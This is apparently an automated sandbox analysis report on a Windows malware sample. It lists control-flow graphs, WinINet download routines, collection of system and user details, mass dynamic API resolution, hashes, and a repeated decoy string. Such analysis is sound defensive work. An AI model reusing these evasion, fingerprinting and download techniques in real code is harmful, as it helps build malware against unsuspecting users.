                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F3462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F3467D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F3479F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F3471D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F347AA
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34667
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 6c7baed75053fd94767680c67755f53ed18215812021eba4132813a669178e64
                            • Instruction ID: ed0a18a236f0dfb77fbfcd517677def1f8e19c76796379c197e62c45ede79e85
                            • Opcode Fuzzy Hash: 6c7baed75053fd94767680c67755f53ed18215812021eba4132813a669178e64
                            • Instruction Fuzzy Hash: 184148616D26147EE634FBA48872F9F76625F42F8BF407044EE22762C2CB70B60855A3

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 f362d0-f3635b call f4aab0 call f34800 call f4aa50 InternetOpenA StrCmpCA 1040 f36364-f36368 1033->1040 1041 f3635d 1033->1041 1042 f36559-f36575 call f4aab0 call f4ab10 * 2 1040->1042 1043 f3636e-f36392 InternetConnectA 1040->1043 1041->1040 1061 f36578-f3657d 1042->1061 1044 f36398-f3639c 1043->1044 1045 f3654f-f36553 InternetCloseHandle 1043->1045 1048 f363aa 1044->1048 1049 f3639e-f363a8 1044->1049 1045->1042 1051 f363b4-f363e2 HttpOpenRequestA 1048->1051 1049->1051 1053 f36545-f36549 InternetCloseHandle 1051->1053 1054 f363e8-f363ec 1051->1054 1053->1045 1056 f36415-f36455 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 f363ee-f3640f InternetSetOptionA 1054->1057 1059 f36457-f36477 call f4aa50 call f4ab10 * 2 1056->1059 1060 f3647c-f3649b call f48ad0 1056->1060 1057->1056 1059->1061 1067 f36519-f36539 call f4aa50 call f4ab10 * 2 1060->1067 1068 f3649d-f364a4 1060->1068 1067->1061 1071 f36517-f3653f InternetCloseHandle 1068->1071 1072 f364a6-f364d0 InternetReadFile 1068->1072 1071->1053 1076 f364d2-f364d9 1072->1076 1077 f364db 1072->1077 1076->1077 1080 f364dd-f36515 call f4acc0 call f4abb0 call f4ab10 1076->1080 1077->1071 1080->1072
                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F34889
                              • Part of subcall function 00F34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F34899
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • InternetOpenA.WININET(00F50DFF,00000001,00000000,00000000,00000000), ref: 00F36331
                            • StrCmpCA.SHLWAPI(?,0098E540), ref: 00F36353
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F36385
                            • HttpOpenRequestA.WININET(00000000,GET,?,0098DA70,00000000,00000000,00400100,00000000), ref: 00F363D5
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F3640F
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F36421
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00F3644D
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F364BD
                            • InternetCloseHandle.WININET(00000000), ref: 00F3653F
                            • InternetCloseHandle.WININET(00000000), ref: 00F36549
                            • InternetCloseHandle.WININET(00000000), ref: 00F36553
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: 0a01ce5dc7c7f126b2f45038da67804afbb4e6f66aa39a1b55667eb9652595de
                            • Instruction ID: 611c7c759bf60a8cb9f9ca28db330cf3b92ccab168c8ce1a3d1568890cff0229
                            • Opcode Fuzzy Hash: 0a01ce5dc7c7f126b2f45038da67804afbb4e6f66aa39a1b55667eb9652595de
                            • Instruction Fuzzy Hash: 03717D71A40218EBEB24DFA0DC59BEEB775FB44310F108198F60AAB1C5DBB46A84DF51

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1356 f47690-f476da GetWindowsDirectoryA 1357 f476e3-f47757 GetVolumeInformationA call f48e90 * 3 1356->1357 1358 f476dc 1356->1358 1365 f47768-f4776f 1357->1365 1358->1357 1366 f47771-f4778a call f48e90 1365->1366 1367 f4778c-f477a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 f477b8-f477e8 wsprintfA call f4aa50 1367->1369 1370 f477a9-f477b6 call f4aa50 1367->1370 1377 f4780e-f4781e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F476D2
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F4770F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47793
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F4779A
                            • wsprintfA.USER32 ref: 00F477D0
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\
                            • API String ID: 1544550907-3809124531
                            • Opcode ID: 9ded72c9eb1ee7a79cb10bba3cf598539b49bb929bc93ae07559e156e3467a7a
                            • Instruction ID: e692117f7733c90d4ccdff6c8d48eb4235bc04333216119cf64678d7618c6924
                            • Opcode Fuzzy Hash: 9ded72c9eb1ee7a79cb10bba3cf598539b49bb929bc93ae07559e156e3467a7a
                            • Instruction Fuzzy Hash: D841B6B1D04348DBDF11EF94DC45BDEBBB8AF08714F104199FA09AB281D7786A44CBA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F311B7), ref: 00F47A10
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F47A17
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F47A2F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: bceb99ecad4b62e6b866a095f2d965c8213045ce6bb15e8835b8dafba12844b5
                            • Instruction ID: ee8341127802317c1fccb88007a6635000ad71182f1eb2970381b48bbc55ba71
                            • Opcode Fuzzy Hash: bceb99ecad4b62e6b866a095f2d965c8213045ce6bb15e8835b8dafba12844b5
                            • Instruction Fuzzy Hash: 85F04FB1944209EFC710DF98DD49BAEFBB8EB05711F10021AFA15A2680C7B569008BA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 2afcd2257abbd5e47389b15ae29bdd827ad99c26a3bae43792dd324b43ca7e77
                            • Instruction ID: 58af55ddd074806e671dbb1ab950e35be5bed9a8dbafb368c800e73f207e62f6
                            • Opcode Fuzzy Hash: 2afcd2257abbd5e47389b15ae29bdd827ad99c26a3bae43792dd324b43ca7e77
                            • Instruction Fuzzy Hash: 80D05E7490030C9BCB10EFE0A84D6DDBB79BB0C225F000654D90562280EA306445CB65

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 f49f20-f49f2a 634 f4a346-f4a3da LoadLibraryA * 8 633->634 635 f49f30-f4a341 GetProcAddress * 43 633->635 636 f4a456-f4a45d 634->636 637 f4a3dc-f4a451 GetProcAddress * 5 634->637 635->634 638 f4a526-f4a52d 636->638 639 f4a463-f4a521 GetProcAddress * 8 636->639 637->636 640 f4a52f-f4a5a3 GetProcAddress * 5 638->640 641 f4a5a8-f4a5af 638->641 639->638 640->641 642 f4a5b5-f4a642 GetProcAddress * 6 641->642 643 f4a647-f4a64e 641->643 642->643 644 f4a654-f4a72a GetProcAddress * 9 643->644 645 f4a72f-f4a736 643->645 644->645 646 f4a7b2-f4a7b9 645->646 647 f4a738-f4a7ad GetProcAddress * 5 645->647 648 f4a7ec-f4a7f3 646->648 649 f4a7bb-f4a7e7 GetProcAddress * 2 646->649 647->646 650 f4a825-f4a82c 648->650 651 f4a7f5-f4a820 GetProcAddress * 2 648->651 649->648 652 f4a922-f4a929 650->652 653 f4a832-f4a91d GetProcAddress * 10 650->653 651->650 654 f4a98d-f4a994 652->654 655 f4a92b-f4a988 GetProcAddress * 4 652->655 653->652 656 f4a996-f4a9a9 GetProcAddress 654->656 657 f4a9ae-f4a9b5 654->657 655->654 656->657 658 f4a9b7-f4aa13 GetProcAddress * 4 657->658 659 f4aa18-f4aa19 657->659 658->659
                            APIs
                            • GetProcAddress.KERNEL32(75900000,00976940), ref: 00F49F3D
                            • GetProcAddress.KERNEL32(75900000,009766C0), ref: 00F49F55
                            • GetProcAddress.KERNEL32(75900000,00988EF8), ref: 00F49F6E
                            • GetProcAddress.KERNEL32(75900000,00988F10), ref: 00F49F86
                            • GetProcAddress.KERNEL32(75900000,0098CF88), ref: 00F49F9E
                            • GetProcAddress.KERNEL32(75900000,0098CEE0), ref: 00F49FB7
                            • GetProcAddress.KERNEL32(75900000,0097B018), ref: 00F49FCF
                            • GetProcAddress.KERNEL32(75900000,0098CE50), ref: 00F49FE7
                            • GetProcAddress.KERNEL32(75900000,0098CF58), ref: 00F4A000
                            • GetProcAddress.KERNEL32(75900000,0098CE68), ref: 00F4A018
                            • GetProcAddress.KERNEL32(75900000,0098CDF0), ref: 00F4A030
                            • GetProcAddress.KERNEL32(75900000,00976880), ref: 00F4A049
                            • GetProcAddress.KERNEL32(75900000,009768C0), ref: 00F4A061
                            • GetProcAddress.KERNEL32(75900000,00976980), ref: 00F4A079
                            • GetProcAddress.KERNEL32(75900000,00976780), ref: 00F4A092
                            • GetProcAddress.KERNEL32(75900000,0098CEF8), ref: 00F4A0AA
                            • GetProcAddress.KERNEL32(75900000,0098CE80), ref: 00F4A0C2
                            • GetProcAddress.KERNEL32(75900000,0097B158), ref: 00F4A0DB
                            • GetProcAddress.KERNEL32(75900000,00976900), ref: 00F4A0F3
                            • GetProcAddress.KERNEL32(75900000,0098CE08), ref: 00F4A10B
                            • GetProcAddress.KERNEL32(75900000,0098CE20), ref: 00F4A124
                            • GetProcAddress.KERNEL32(75900000,0098CE98), ref: 00F4A13C
                            • GetProcAddress.KERNEL32(75900000,0098CEB0), ref: 00F4A154
                            • GetProcAddress.KERNEL32(75900000,009768A0), ref: 00F4A16D
                            • GetProcAddress.KERNEL32(75900000,0098CE38), ref: 00F4A185
                            • GetProcAddress.KERNEL32(75900000,0098CEC8), ref: 00F4A19D
                            • GetProcAddress.KERNEL32(75900000,0098CF10), ref: 00F4A1B6
                            • GetProcAddress.KERNEL32(75900000,0098CF28), ref: 00F4A1CE
                            • GetProcAddress.KERNEL32(75900000,0098CF40), ref: 00F4A1E6
                            • GetProcAddress.KERNEL32(75900000,0098CF70), ref: 00F4A1FF
                            • GetProcAddress.KERNEL32(75900000,0098CFA0), ref: 00F4A217
                            • GetProcAddress.KERNEL32(75900000,0098C820), ref: 00F4A22F
                            • GetProcAddress.KERNEL32(75900000,0098CA60), ref: 00F4A248
                            • GetProcAddress.KERNEL32(75900000,00989E88), ref: 00F4A260
                            • GetProcAddress.KERNEL32(75900000,0098C838), ref: 00F4A278
                            • GetProcAddress.KERNEL32(75900000,0098C850), ref: 00F4A291
                            • GetProcAddress.KERNEL32(75900000,009768E0), ref: 00F4A2A9
                            • GetProcAddress.KERNEL32(75900000,0098C808), ref: 00F4A2C1
                            • GetProcAddress.KERNEL32(75900000,00976920), ref: 00F4A2DA
                            • GetProcAddress.KERNEL32(75900000,0098C868), ref: 00F4A2F2
                            • GetProcAddress.KERNEL32(75900000,0098C958), ref: 00F4A30A
                            • GetProcAddress.KERNEL32(75900000,009762E0), ref: 00F4A323
                            • GetProcAddress.KERNEL32(75900000,009765A0), ref: 00F4A33B
                            • LoadLibraryA.KERNEL32(0098C880,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A34D
                            • LoadLibraryA.KERNEL32(0098C898,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A35E
                            • LoadLibraryA.KERNEL32(0098CA78,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A370
                            • LoadLibraryA.KERNEL32(0098C8E0,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A382
                            • LoadLibraryA.KERNEL32(0098C928,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A393
                            • LoadLibraryA.KERNEL32(0098CA90,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A3A5
                            • LoadLibraryA.KERNEL32(0098C9A0,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A3B7
                            • LoadLibraryA.KERNEL32(0098CA18,?,00F45EF3,00F50AEB,?,?,?,?,?,?,?,?,?,?,00F50AEA,00F50AE7), ref: 00F4A3C8
                            • GetProcAddress.KERNEL32(75FD0000,00976420), ref: 00F4A3EA
                            • GetProcAddress.KERNEL32(75FD0000,0098C8F8), ref: 00F4A402
                            • GetProcAddress.KERNEL32(75FD0000,00988AE0), ref: 00F4A41A
                            • GetProcAddress.KERNEL32(75FD0000,0098C940), ref: 00F4A433
                            • GetProcAddress.KERNEL32(75FD0000,009764A0), ref: 00F4A44B
                            • GetProcAddress.KERNEL32(6FEA0000,0097B090), ref: 00F4A470
                            • GetProcAddress.KERNEL32(6FEA0000,009765C0), ref: 00F4A489
                            • GetProcAddress.KERNEL32(6FEA0000,0097B108), ref: 00F4A4A1
                            • GetProcAddress.KERNEL32(6FEA0000,0098CA48), ref: 00F4A4B9
                            • GetProcAddress.KERNEL32(6FEA0000,0098C910), ref: 00F4A4D2
                            • GetProcAddress.KERNEL32(6FEA0000,009763E0), ref: 00F4A4EA
                            • GetProcAddress.KERNEL32(6FEA0000,00976440), ref: 00F4A502
                            • GetProcAddress.KERNEL32(6FEA0000,0098CAA8), ref: 00F4A51B
                            • GetProcAddress.KERNEL32(763B0000,009764E0), ref: 00F4A53C
                            • GetProcAddress.KERNEL32(763B0000,00976500), ref: 00F4A554
                            • GetProcAddress.KERNEL32(763B0000,0098CAC0), ref: 00F4A56D
                            • GetProcAddress.KERNEL32(763B0000,0098C970), ref: 00F4A585
                            • GetProcAddress.KERNEL32(763B0000,00976320), ref: 00F4A59D
                            • GetProcAddress.KERNEL32(750F0000,0097B248), ref: 00F4A5C3
                            • GetProcAddress.KERNEL32(750F0000,0097B2E8), ref: 00F4A5DB
                            • GetProcAddress.KERNEL32(750F0000,0098CA30), ref: 00F4A5F3
                            • GetProcAddress.KERNEL32(750F0000,009765E0), ref: 00F4A60C
                            • GetProcAddress.KERNEL32(750F0000,00976480), ref: 00F4A624
                            • GetProcAddress.KERNEL32(750F0000,0097B0B8), ref: 00F4A63C
                            • GetProcAddress.KERNEL32(75A50000,0098CAD8), ref: 00F4A662
                            • GetProcAddress.KERNEL32(75A50000,00976280), ref: 00F4A67A
                            • GetProcAddress.KERNEL32(75A50000,00988B20), ref: 00F4A692
                            • GetProcAddress.KERNEL32(75A50000,0098C7F0), ref: 00F4A6AB
                            • GetProcAddress.KERNEL32(75A50000,0098C9D0), ref: 00F4A6C3
                            • GetProcAddress.KERNEL32(75A50000,00976400), ref: 00F4A6DB
                            • GetProcAddress.KERNEL32(75A50000,009764C0), ref: 00F4A6F4
                            • GetProcAddress.KERNEL32(75A50000,0098C8B0), ref: 00F4A70C
                            • GetProcAddress.KERNEL32(75A50000,0098C8C8), ref: 00F4A724
